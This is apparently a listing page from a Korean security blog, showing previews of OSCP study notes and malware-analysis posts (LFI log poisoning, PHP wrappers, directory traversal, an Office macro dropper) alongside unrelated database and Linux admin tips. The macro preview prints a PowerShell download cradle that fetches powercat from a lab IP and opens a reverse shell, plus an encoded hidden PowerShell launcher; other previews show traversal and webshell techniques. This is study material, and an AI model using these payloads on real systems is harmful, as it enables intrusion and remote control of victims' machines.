๋ณธ๋ฌธ ๋ฐ”๋กœ๊ฐ€๊ธฐ
  • Tried. Failed. Logged.
728x90

์ „์ฒด ๊ธ€747

์ทจ์•ฝ์  ๋ถ„์„ - NTLM ํฌ๋ฆฌ๋ด์…œ ํŒจํ‚ท ์Šค๋‹ˆํผ (responder.py) GitHub repohttps://github.com/SpiderLabs/Responder GitHub - SpiderLabs/Responder: Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue autheResponder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authenticat...github.com ์‚ฌ์šฉ ์˜ˆ์‹œ... 2025. 7. 27.
์•…์„ฑ์ฝ”๋“œ ๋ถ„์„ - ๋งคํฌ๋กœ ๋ฌธ์„œ ์•…์„ฑ ํŒŒ์ผ IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.2/powercat.ps1');powercat -c 192.168.119.2 -p 4444 -e powershell str = "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGUAdwA..."n = 50for i in range(0, len(str), n): print("Str = Str + " + '"' + str[i:i+n] + '"')์ฒญํฌํ™”(๋ฌธ์ž์—ด์ด ๋„ˆ๋ฌด ๊ธธ๋ฉด ์˜ค๋ฅ˜๊ฐ€ ๋ฐœ์ƒ) Sub AutoOpen() MyMacroEnd SubSub Document_Open() MyMacroEnd SubSub MyMacro() Di.. 2025. 7. 26.
OSCP - 9.3.2. Using Non-Executable Files ํŒŒ์ผ ์—…๋กœ๋“œ ์‹œ ์‹คํ–‰์ด ๋ถˆ๊ฐ€๋Šฅํ•œ ๊ฒฝ์šฐ(e.g. ์‹คํ–‰ ๊ถŒํ•œ์ด ์—†๋Š” ์—…๋กœ๋“œ ํด๋”)์— ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ๋Š” ์ทจ์•ฝ์  ๋ถ„์„ ๋ฐฉ๋ฒ•์„ ์•Œ์•„๋ณธ๋‹ค. ์šฐ์„  ํŒŒ์ผ ์—…๋กœ๋“œ ์‹œ filename์— ๋งค๊ฐœ๋ณ€์ˆ˜๋ฅผ ์กฐ์ž‘ํ•˜์—ฌ ../../../../../../../test.txt๋ฅผ ๋„ฃ์–ด ์„œ๋ฒ„๋กœ ์ „๋‹ฌํ•œ ๊ฒฝ์šฐ ์„œ๋ฒ„ ์ธก์ด ์ •์ƒ ์‘๋‹ต์„ ํ•œ ๊ฒฝ์šฐ ์ทจ์•ฝ ๊ฐ€๋Šฅ์„ฑ์ด ์žˆ์„ ์ˆ˜ ์žˆ๋‹ค. ํŠนํžˆ ์—ฌ๊ธฐ์— ๋ฃจํŠธ(/) ๊ฒฝ๋กœ์ž„์—๋„ ์ •์ƒ ์—…๋กœ๋“œ ๋œ ๊ฒƒ์ด๋ผ๋ฉด root์˜ ํ™ˆ๋””๋ ‰ํ„ฐ๋ฆฌ๋„ ์ง์ ‘ ์ ‘๊ทผ์ด ๊ฐ€๋Šฅํ•จ์„ ์•Œ ์ˆ˜ ์žˆ๋‹ค. kali@kali:~$ ssh-keygenGenerating public/private rsa key pair.Enter file in which to save the key (/home/kali/.ssh/id_rsa): fileupEnter passphras.. 2025. 7. 22.
OSCP - 9.2.2. PHP Wrappers admin.php ํŒŒ์ผ ๋‚ด์šฉkali@kali:~$ curl http://mountaindesserts.com/meteor/index.php?page=admin.php...Admin The admin page is currently under maintenance. ๋‹ค์Œ๊ณผ ๊ฐ™์ด LFI๊ฐ€ ๋ฐœ์ƒํ•˜๋Š” ๊ฒฝ์šฐ(์ž…๋ ฅ ๊ฒ€์ฆ ์—†์ด ๋ฐ”๋กœ include ์‹คํ–‰ => include $_GET["page"];)PHP Wrappers์— ์ทจ์•ฝํ•  ์ˆ˜ ์žˆ๋‹ค. admin.php ํŽ˜์ด์ง€ base64 ์ธ์ฝ”๋”ฉ(php://filter)kali@kali:~$ curl http://mountaindesserts.com/meteor/index.php?page=php://filter/convert.base64-encode/resourc.. 2025. 7. 21.
OSCP - 9.2. File Inclusion Vulnerabilities, Labs Local File Inclusion (LFI) ๋ฐ access.log ํฌ์ด์ฆˆ๋‹ ์ทจ์•ฝ์  access.log ํฌ์ด์ฆˆ๋‹(์˜ค์—ผ)User-Agent ํ—ค๋”์— ํ•œ์ค„ ์งœ๋ฆฌ ์›น์‰˜ ์ฝ”๋“œ๋ฅผ ๋„ฃ๋Š”๋‹ค. ์ดํ›„ ์„œ๋ฒ„๋กœ ๋ถ€ํ„ฐ ์š”์ฒญ์ด ๊ฐ€๊ฒŒ ๋˜๋ฉด ์„œ๋ฒ„ ์ธก์— ์•„ํŒŒ์น˜ ๋กœ๊ทธ ํŒŒ์ผ์ธ /var/log/apache2/access.log(์œˆ๋„์šฐ ์˜ˆ์‹œ: C:\xampp\apache\logs\access.log)์—๋Š” ์‚ฌ์šฉ์ž์˜ ๋ฐฉ๋ฌธ ์ •๋ณด(์•„์ดํ”ผ ์ฃผ์†Œ, ๊ฒฝ๋กœ, User-Agent)๊ฐ€ ๋‚จ๊ฒŒ ๋œ๋‹ค. ์ด์ œ LFI ์ทจ์•ฝ์ ์ด ์žˆ๋Š” ํŒŒ๋ผ๋ฏธํ„ฐ์—๋‹ค /var/log/apache2/access.log๋ฅผ ์ž…๋ ฅ์„ ํ•ด ํŒŒ์ผ์„ ์ฝ์–ด ์˜ค๊ฒŒ ๋˜๋ฉด์„œ ํ•ด๋‹น PHP ์ฝ”๋“œ๊ฐ€ ์‹คํ–‰๋˜๋ฉด์„œ ์›๊ฒฉ ์ฝ”๋“œ ์‹คํ–‰ ์ทจ์•ฝ์ด ๋ฐœ์ƒํ•œ๋‹ค. (*cmd ํŒŒ๋ผ๋ฏธํ„ฐ ์•ž์—๋Š” ?๊ฐ€ ์•„๋‹Œ &์ด ์˜ฌ ๊ฒƒ) nc -nvlp 4444์ข€ ๋” ์›ํ™œํ•œ ์ œ์–ด๋ฅผ ์œ„ํ•œ ๊ฒฝ์šฐ ๊ณต๊ฒฉ์ž๋Š” ๋ฆฌ๋ฒ„์Šค์‰˜์„ ์—ด์–ด ๋Œ€์ƒ ์„œ๋ฒ„๊ฐ€ ์—ฐ๊ฒฐ์„.. 2025. 7. 21.
OSCP - 9.1. Directory Traversal, Labs CVE-2021-43 --path-as-is ์ทจ์•ฝ์  ๊ฐœ์š”Grafana 8.x ๋ฒ„์ „์—์„œ ๋ฐœ์ƒ ํ•˜๋Š” Path Traversal ์ทจ์•ฝ์ ์ด๋‹ค. ํ”Œ๋Ÿฌ๊ทธ์ธ API ์—”๋“œํฌ์ธํŠธ์˜ ๊ฒฝ๋กœ์— ๋Œ€ํ•œ ์‚ฌ์šฉ์ž ์ž…๋ ฅ์— ๋Œ€ํ•œ ๊ฒ€์ฆ์ด ๋ฏธํกํ•˜์—ฌ ์„œ๋น„์Šค ์˜์—ญ ์™ธ์˜ ์ƒ์œ„ ๋””๋ ‰ํ„ฐ๋ฆฌ ๋“ฑ์— ์•ก์„ธ์Šค๊ฐ€ ๊ฐ€๋Šฅํ•˜๊ฒŒ ๋œ๋‹ค. ๋ฌธ์ œ์˜ ์ฝ”๋“œ : https://github.com/grafana/grafana/blob/c80e7764d84d531fa56dca14d5b96cf0e7099c47/pkg/api/plugins.go#L284 ์ฐธ๊ณ https://github.com/taythebot/CVE-2021-43798 GitHub - taythebot/CVE-2021-43798: CVE-2021-43798 - Grafana 8.x Path Traversal (Pre-Auth)CVE-2021-43798 - Grafan.. 2025. 7. 21.
์‹œ์Šคํ…œ ๋ณด์•ˆ - ํ•ด์‹œ(MD5, SHA1, SHA256) ํ™•์ธ ์‚ฌ์ดํŠธ ๋ชจ์Œ ํ•ด์‹œ ์ƒ์„ฑ https://hashes.com/en/generate/hash Generate MD5, SHA1, SHA256, SHA512, NTLM, MySQL, Whirlpool, Ripemd, Keccak, SHA3, SHAKE hashes online hashes.com ํ•ด์‹œ ์‹๋ณ„ https://hashes.com/en/tools/hash_identifier Hash Type Identifier - Identify unknown hashesIdentify and detect unknown hashes using this tool. This page will tell you what type of hash a given string is. If you want to attempt to Decrypt.. 2025. 7. 18.
Oracle DB - ์‚ฌ์šฉ์ž ๊ถŒํ•œ ๋ฐ ํ…Œ์ด๋ธ” ํ™•์ธ ์ฟผ๋ฆฌ๋ฌธ --ํ˜„์žฌ ์‚ฌ์šฉ์ž ํ™•์ธ SQL: SELECT USER FROM DUAL;-- ์„ธ์…˜ ์‚ฌ์šฉ์ž ํ™•์ธ:SELECT SYS_CONTEXT('USERENV','SESSION_USER') FROM DUAL;-- ๊ถŒํ•œ ํ™•์ธ:SELECT * FROM SESSION_PRIVS;-- DBA ์—ฌ๋ถ€ ํ™•์ธ:SELECT * FROM USER_ROLE_PRIVS;-- ํ…Œ์ด๋ธ” ๋ชฉ๋ก ํ™•์ธSELECT table_name FROM user_tables; 2025. 7. 17.
Oracle DB - ์˜ค๋ผํด ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์„œ๋ฒ„ ์ ‘์† ํด๋ผ์ด์–ธํŠธ ๋ชจ์Œ(DBeaver, SQLPLUS) DBeaver(GUI)https://dbeaver.io/ DBeaver Community | Free Universal Database ToolDBeaver Universal Database Tool DBeaver Community is a free cross-platform database tool for developers, database administrators, analysts, and everyone working with data. It supports all popular SQL databases like MySQL, MariaDB, PostgreSQL, SQLite, Apachdbeaver.io SQLPLUS(CLI)https://www.oracle.com/database/technol.. 2025. 7. 17.
๊ฐœ์ธ์ •๋ณด๋ณดํ˜ธ๋ฒ• - ๊ฐœ์ธ์ •๋ณดํŒŒ์ผ ๊ฒ€์ƒ‰ ์ œ32์กฐ(๊ฐœ์ธ์ •๋ณดํŒŒ์ผ์˜ ๋“ฑ๋ก ๋ฐ ๊ณต๊ฐœ) โ‘  ๊ณต๊ณต๊ธฐ๊ด€์˜ ์žฅ์ด ๊ฐœ์ธ์ •๋ณดํŒŒ์ผ์„ ์šด์šฉํ•˜๋Š” ๊ฒฝ์šฐ์—๋Š” ๋‹ค์Œ ๊ฐ ํ˜ธ์˜ ์‚ฌํ•ญ์„ ๋ณดํ˜ธ์œ„์›ํšŒ์— ๋“ฑ๋กํ•˜์—ฌ์•ผ ํ•œ๋‹ค. ์›ํ•˜๋Š” (๊ณต๊ณต)๊ธฐ๊ด€์ด ์–ด๋–ค ๊ฐœ์ธ์ •๋ณด๋ฅผ ์–ด๋– ํ•œ ๋ชฉ์ ์œผ๋กœ ์ˆ˜์ง‘ ๋ฐ ์ฒ˜๋ฆฌํ•˜๋Š”์ง€ ๊ฐœ์ธ์ •๋ณด์œ„์›ํšŒ๊ฐ€ ์ œ๊ณตํ•˜๋Š” ๊ฐœ์ธ์ •๋ณด ํฌํ„ธ์—์„œ ํ™•์ธ์ด ๊ฐ€๋Šฅ https://www.privacy.go.kr/front/wcp/dcl/per/personalInfoFileSrhList.do#none ๊ฐœ์ธ์ •๋ณด ํฌํ„ธ๊ฐœ์ธ์ •๋ณด๋ณดํ˜ธ์œ„์›ํšŒ๋Š” ๊ฐœ์ธ์ •๋ณด์˜ ์ฒ˜๋ฆฌ์™€ ๋ณดํ˜ธ์— ๊ด€ํ•œ ์‚ฌ์•ˆ์„ ๋…๋ฆฝ์ ์œผ๋กœ ์ˆ˜ํ–‰ํ•˜๊ธฐ ์œ„ํ•ด ์„ค๋ฆฝ๋œ ํ•ฉ์˜์ œ ์ค‘์•™ํ–‰์ •๊ธฐ๊ด€์ž…๋‹ˆ๋‹ค.www.privacy.go.kr 2025. 7. 9.
Node.js - WSL nodejs ๋ฒ„์ „ ์—…๊ทธ๋ ˆ์ด๋“œ nodejs ์‚ญ์ œsudo apt-get remove -y nodejssudo rm -rf /usr/local/lib/node_modules nodejs ์„ค์น˜curl -fsSL https://deb.nodesource.com/setup_22.x | sudo -E bash -sudo apt-get install -y nodejs 2025. 7. 9.
๋ฆฌ๋ˆ…์Šค - ๋ ˆ๋“œํ–‡ ๊ณ„์ • ๋ถ„์‹ค ์ดˆ๊ธฐํ™” 1. GRUB ํ™”๋ฉด์—์„œ kernel ์„ ํƒํ•˜๊ณ  'e' ํ‚ค๋ฅผ ๋ˆŒ๋Ÿฌ edit ์ง„์ž… 2. grub edit ๋งจ ๋’ค์— single ๋˜๋Š” init=/bin/bash ์ž…๋ ฅ ํ›„ ์—”ํ„ฐ ๋ˆ„๋ฅด๊ณ , b๋ฅผ ๋ˆŒ๋Ÿฌ ์žฌ๋ถ€ํŒ… (์ดํ›„ ๋ถ€ํŠธ ํ›„ ์‰˜ ์ง„์ž… ์‹œ) 3. mount -o remount,rw / 4. passwd root 5. sync 6. reboot -f 2025. 7. 7.
728x90